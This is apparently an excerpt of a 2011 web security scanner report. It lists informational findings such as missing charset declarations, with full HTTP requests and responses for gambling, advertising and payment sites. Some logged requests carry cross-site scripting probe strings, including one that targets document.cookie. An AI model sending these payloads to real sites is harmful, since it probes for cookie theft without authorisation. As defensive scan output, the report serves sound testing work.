<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.48. https://www.norskelodd.com/no/play/7thHeaven

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/play/7thHeaven

Request

GET /no/play/7thHeaven HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:02:04 GMT
Connection: close
Content-Length: 100366
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.49. https://www.norskelodd.com/no/play/GonzosQuest

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/play/GonzosQuest

Request

GET /no/play/GonzosQuest HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:47 GMT
Connection: close
Content-Length: 100369
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.50. https://www.norskelodd.com/no/promotions/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/promotions/

Request

GET /no/promotions/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:30 GMT
Connection: close
Content-Length: 101653
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.51. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.postcodelottery.com
Path:   /PlayNOW/OrderYourTickets.htm

Request

GET /PlayNOW/OrderYourTickets.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:32:10 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...

24.52. https://www.thawte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thawte.com
Path:   /

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:53 GMT
Server: Apache
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 39378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

25. HTML does not specify charset
There are 25 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


25.1. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Request

GET /adi/N6296.276969.AUDIENCESCIENCE/B5384441.427;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B6d73f27533380ecb%3B12ff8dd2e5c,0%3B%3B%3B2381065140,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAAFS7d-C8BAAAAAAAAADUzNTk2ZWY0LTdmYmItMTFlMC1iMGUwLTlmMzlhM2ZiOTE3NgAdjgEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550335? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8277
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:52:21 GMT
Expires: Mon, 16 May 2011 12:52:21 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->

<!-- Code auto-generated on Mon Apr 11 15:07:45 EDT 2011 -->

<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

25.2. http://d.xp1.ru4.com/um

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /um

Request

GET /um?_o=62795&_i=97956&_u=79bc469d-a782-45e9-dad7-b6bd4bc5df2d HTTP/1.1
Host: d.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: X1ID=AA-00000001931708427; M62795-52786=1; 17210403-B17210472=6|17210476|0|0|0|17210467|17226289|-1; O1807966=256; P1807966=c3N2X2MzfFl8MTMwNTU1MDMzMXxzc3ZfYnxjM3wxMzA1NTUwMzMxfHNzdl8xfDI4NTk1MjcyMXwxMzA1NTUwMzMxfA==

Response

HTTP/1.1 400 Bad request
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:13 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Content-length: 147
Content-type: text/html
Connection: close

<HTML><HEAD><TITLE>Bad request</TITLE></HEAD>
<BODY><H1>Bad request</H1>
Your browser sent a query this server could not understand.
</BODY></HTML>

25.3. http://download.neogames-tech.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.neogames-tech.com
Path:   /

Request

GET / HTTP/1.1
Host: download.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.4.10.1305545979;

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:38 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

25.4. http://f.nexac.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f.nexac.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: f.nexac.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: na_tc=Y; na_id=326a9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efa144a76584; na_lr=20110515; na_ps=3

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 16 May 2011 11:39:06 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.5. http://in.getclicky.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:39:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

25.6. https://in.getclicky.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://in.getclicky.com
Path:   /

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

25.7. http://members.bet365.com/site.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.bet365.com
Path:   /site.asp

Request

GET /site.asp HTTP/1.1
Host: members.bet365.com
Proxy-Connection: keep-alive
Referer: http://www.bet365.com/en/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:52 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Cteonnt-Length: 1230
Content-Type: text/html
Cache-control: private
Content-Length: 1230


<html>
<head>
<script language="JavaScript" src="./home/js/swfobject_vB006cr.js"></script>
<script language="JavaScript" src="./home/js/cookies_vA002cr.js"></script>
</he
...[SNIP]...

25.8. http://neogames-tech.com/outbound/article/www.lga.org.mt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://neogames-tech.com
Path:   /outbound/article/www.lga.org.mt

Request

GET /outbound/article/www.lga.org.mt HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:27:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.9. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=41&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 16-May-2011 12:51:49 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"2\": 1305550329}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Content-Length: 508

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...

25.10. http://trk.primescratchcards.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.primescratchcards.com
Path:   /

Request

GET /?ac=50&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:44:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 134
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=BJEGLCIAEIAOPPLGIKGGAJPK; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 50 ,130137 ,5143, 201105160000

</html>

25.11. http://www.gamblersanonymous.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamblersanonymous.org
Path:   /

Request

GET / HTTP/1.1
Host: www.gamblersanonymous.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:18:24 GMT
Server: Apache
Last-Modified: Thu, 01 Apr 2010 20:42:43 GMT
Accept-Ranges: bytes
Content-Length: 2949
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<TITLE>Gamblers Anonymous Official Home Page</TITLE></HEAD>
<BODY BACKGROUND="images/bkgrnd.gif">
<CENTER>
<TABLE BORDER="0" CELLPADDING="4
...[SNIP]...

25.12. http://www.maestrocard.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.maestrocard.com
Path:   /

Request

GET / HTTP/1.1
Host: www.maestrocard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:50:21 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 312
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Priceless.com<
...[SNIP]...

25.13. http://www.mastercard.com/uk/gateway.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mastercard.com
Path:   /uk/gateway.html

Request

GET /uk/gateway.html HTTP/1.1
Host: www.mastercard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>

25.14. http://www.neogames.com/outbound/article/crazyscratch.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/crazyscratch.com

Request

GET /outbound/article/crazyscratch.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.15. http://www.neogames.com/outbound/article/karamba.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/karamba.com

Request

GET /outbound/article/karamba.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.16. http://www.neogames.com/outbound/article/mundirasca.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/mundirasca.com

Request

GET /outbound/article/mundirasca.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.17. http://www.neogames.com/outbound/article/norgesloddet.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/norgesloddet.com

Request

GET /outbound/article/norgesloddet.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.18. http://www.neogames.com/outbound/article/scratch.betsson.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/scratch.betsson.com

Request

GET /outbound/article/scratch.betsson.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.19. http://www.neogames.com/outbound/article/www.crazyscratch.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/www.crazyscratch.com

Request

GET /outbound/article/www.crazyscratch.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.20. http://www.neogames.com/outbound/article/www.interwetten.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/www.interwetten.com

Request

GET /outbound/article/www.interwetten.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.21. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/www.postcodelottery.co.uk

Request

GET /outbound/article/www.postcodelottery.co.uk HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

